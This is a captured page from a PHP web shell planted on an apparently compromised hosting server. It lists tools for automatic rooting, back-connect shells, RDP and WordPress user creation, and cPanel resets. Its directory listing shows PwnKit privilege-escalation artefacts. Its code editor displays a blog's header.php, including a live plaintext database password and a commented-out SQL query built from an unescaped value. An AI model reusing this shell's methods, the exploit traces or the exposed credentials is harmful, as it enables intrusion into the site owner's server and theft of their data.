Linux dpw.dpwebtech.com 3.10.0-1160.88.1.el7.x86_64 #1 SMP Tue Mar 7 15:41:52 UTC 2023 x86_64
Apache
: 192.232.243.69 | : 3.144.163.15
54 Domain
7.3.33
dpclient
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
dpclient /
public_html /
itailorBlog /
includes /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
config.php
14.33
KB
-rw-r--r--
end.php
31
B
-rw-r--r--
footer.php
13.79
KB
-rw-r--r--
header.php
9.51
KB
-rw-r--r--
index.html
131
B
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
session.php
228
B
-rw-r--r--
start.php
25
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : header.php
<!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title> <?= $seoTitle ?? null ?> </title> <meta name="description" content="<?= (!empty($seoDescription)) ? $seoDescription : null ?>"> <meta name="keywords" content="<?= (!empty($seoKeywords)) ? $seoKeywords : null ?>"> <meta name="author" content="<?= (!empty($seoTitle)) ? $seoTitle : null ?>"> <link rel="shortcut icon" type="image/x-icon" href="<?= base_url() ?>img/favicon.png"> <link rel="canonical" href="<?= @current_url(); ?>"> <!-- <link rel="stylesheet" href="<//?= base_url() ?>css/owl.carousel.min.css"> <link rel="stylesheet" href="css/owl.theme.default.min.css"> --> <link rel="stylesheet" href="<?= base_url() ?>css/customstyle.css"> <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script> <script src="https://cdnjs.cloudflare.com/ajax/libs/OwlCarousel2/2.3.4/owl.carousel.min.js"></script> <script src="<?= base_url() ?>js/customscript.js"></script> <style> .relative { position: relative; } .submenu { display: none; position: absolute; /* top: 20px; */ left: 0; background-color: #cccccc77; } .submenu .itailor_header_link { margin: 15px; width: 250px; } .submenu .itailor_li { display: block; padding: 10px 5px; width: 100%; } .submenu .itailor_li:hover { background-color: #cccccc; } .pmenu:hover .submenu { display: block; } @media (max-width: 768px) { .itailor_header_ul { display: none; /* Hide the menu in tablet view */ } } /* Media query for screens with a maximum width of 480px (mobile view) */ @media (max-width: 480px) { .itailor_header_ul { display: none; /* Hide the menu in mobile view */ } } </style> </head> <body> <header class="itailor-header"> <div class="header itailor_header_top "> <div class="custom-container addmclass pos-relative"> <div class="itailor_header_wrap flex-equal"> <div class="itailor_header_menu"> <svg width="17" height="13" viewBox="0 0 17 13" fill="none" xmlns="http://www.w3.org/2000/svg"> <path fill-rule="evenodd" clip-rule="evenodd" d="M0.987305 0.5H16.9873V2.5H0.987305V0.5ZM0.987305 5.5H16.9873V7.5H0.987305V5.5ZM0.987305 10.5H16.9873V12.5H0.987305V10.5Z" fill="#19120E" /> </svg> </div> <div class="itailor_header_logo"> <a href="<?= base_url() ?>" aria-label="Home page"> <img class="brand_flogo" src="<?= base_url() ?>img/itailor-svg-logo.svg" alt="logo"> </a> </div> <div class="itailor_header_search"> <div class="search-button"> <a href="#" class="search-toggle" data-selector="#header-1"> <svg width="17" height="17" viewBox="0 0 17 17" fill="none" xmlns="http://www.w3.org/2000/svg"> <path d="M7.06566 2.49998C5.87218 2.49998 4.72759 2.97409 3.88368 3.818C3.03976 4.66192 2.56566 5.80651 2.56566 6.99998C2.56566 8.19346 3.03976 9.33805 3.88368 10.182C4.72759 11.0259 5.87218 11.5 7.06566 11.5C8.25913 11.5 9.40372 11.0259 10.2476 10.182C11.0916 9.33805 11.5657 8.19346 11.5657 6.99998C11.5657 5.80651 11.0916 4.66192 10.2476 3.818C9.40372 2.97409 8.25913 2.49998 7.06566 2.49998ZM12.3147 10.835L16.7727 15.293L15.3587 16.707L10.9007 12.249C9.57876 13.2148 7.94111 13.6461 6.31497 13.4569C4.68883 13.2677 3.19397 12.4719 2.12911 11.2284C1.06425 9.98497 0.507819 8.38548 0.57101 6.7496C0.634202 5.11371 1.31236 3.56191 2.46997 2.4043C3.62758 1.24669 5.17938 0.568528 6.81527 0.505337C8.45116 0.442145 10.0506 0.998576 11.2941 2.06344C12.5376 3.1283 13.3334 4.62316 13.5226 6.2493C13.7118 7.87544 13.2804 9.51308 12.3147 10.835Z" fill="#19120E" /> </svg> </a> </div> </div> </div> <form action="" class="search-box"> <input type="text" class="text search-input" placeholder="Type here to search..." /> <button type="submit" class="searchSubmit"> <svg width="17" height="17" viewBox="0 0 17 17" fill="none" xmlns="http://www.w3.org/2000/svg"> <path d="M7.06566 2.49998C5.87218 2.49998 4.72759 2.97409 3.88368 3.818C3.03976 4.66192 2.56566 5.80651 2.56566 6.99998C2.56566 8.19346 3.03976 9.33805 3.88368 10.182C4.72759 11.0259 5.87218 11.5 7.06566 11.5C8.25913 11.5 9.40372 11.0259 10.2476 10.182C11.0916 9.33805 11.5657 8.19346 11.5657 6.99998C11.5657 5.80651 11.0916 4.66192 10.2476 3.818C9.40372 2.97409 8.25913 2.49998 7.06566 2.49998ZM12.3147 10.835L16.7727 15.293L15.3587 16.707L10.9007 12.249C9.57876 13.2148 7.94111 13.6461 6.31497 13.4569C4.68883 13.2677 3.19397 12.4719 2.12911 11.2284C1.06425 9.98497 0.507819 8.38548 0.57101 6.7496C0.634202 5.11371 1.31236 3.56191 2.46997 2.4043C3.62758 1.24669 5.17938 0.568528 6.81527 0.505337C8.45116 0.442145 10.0506 0.998576 11.2941 2.06344C12.5376 3.1283 13.3334 4.62316 13.5226 6.2493C13.7118 7.87544 13.2804 9.51308 12.3147 10.835Z" fill="#ffffff"></path> </svg> </button> </form> </div> </div> <div class="itailor_header_bottom"> <div class="custom-container"> <div class="itailor_header_list"> <?php $connection = mysqli_connect('localhost', 'dpclient_itailor', 'dAm#VbbjzoYxdAm#VbbjzoYxdAm#VbbjzoYxdAm#VbbjzoYx', 'dpclient_itailor'); ?> <?php $categoriesData = getAllParentCategories(); ?> <ul class="flex-center itailor_header_ul"> <?php if (mysqli_num_rows($categoriesData) > 0) { ?> <?php while ($row = mysqli_fetch_assoc($categoriesData)) { ?> <li class="itailor_header_link font-12 relative pmenu"> <a class="itailor_li" href="<?= base_url('category/' . $row['uri']) ?>" aria-label="<?= $row['uri'] ?> font-12"> <?= $row['name'] ?> </a> <!-- <ul class="itailor_header_ul submenu"> <//?php $curi = $row['uri']; $query = "SELECT * FROM blog_cat WHERE puri = '$curi'"; $result = mysqli_query($connection, $query); ?> <//?php if (mysqli_num_rows($result) > 0) { ?> <//?php while ($sublink = mysqli_fetch_assoc($result)) { ?> <li class="itailor_header_link font-12"> <a href="<//?= base_url('category/' . $row['uri'] . '/' . $sublink['uri']) ?>" class="itailor_li"> <//?= $sublink['name'] ?> </a> </li> <//?php } } ?> </ul> --> </li> <?php } } ?> </ul> </div> </div> </div> <div class="mobile_menu"> <div class="mob_menu__call_row"> <span class="Menu-cross"> <svg xmlns="http://www.w3.org/2000/svg" width="12.263" height="12.263" viewBox="0 0 12.263 12.263"> <path id="Icon_ionic-md-close" data-name="Icon ionic-md-close" d="M19.787,8.75,18.56,7.523l-4.905,4.905L8.75,7.523,7.523,8.75l4.905,4.905L7.523,18.56,8.75,19.787l4.905-4.905,4.905,4.905,1.226-1.226-4.905-4.905Z" transform="translate(-7.523 -7.523)" fill="#303030"></path> </svg> </span> </div> <ul class="nav navbar-mb"> <?php $categoriesData = getAllParentCategories(); ?> <?php if (mysqli_num_rows($categoriesData) > 0) { ?> <?php while ($row = mysqli_fetch_assoc($categoriesData)) { ?> <li class="css_list_menu"> <a class="search-Klink font-13" href="<?= base_url('category/' . $row['uri']) ?>" aria-label="<?= $row['uri'] ?>"> <?= $row['name'] ?> </a> </li> <?php } } ?> </ul> </div> </header>
Close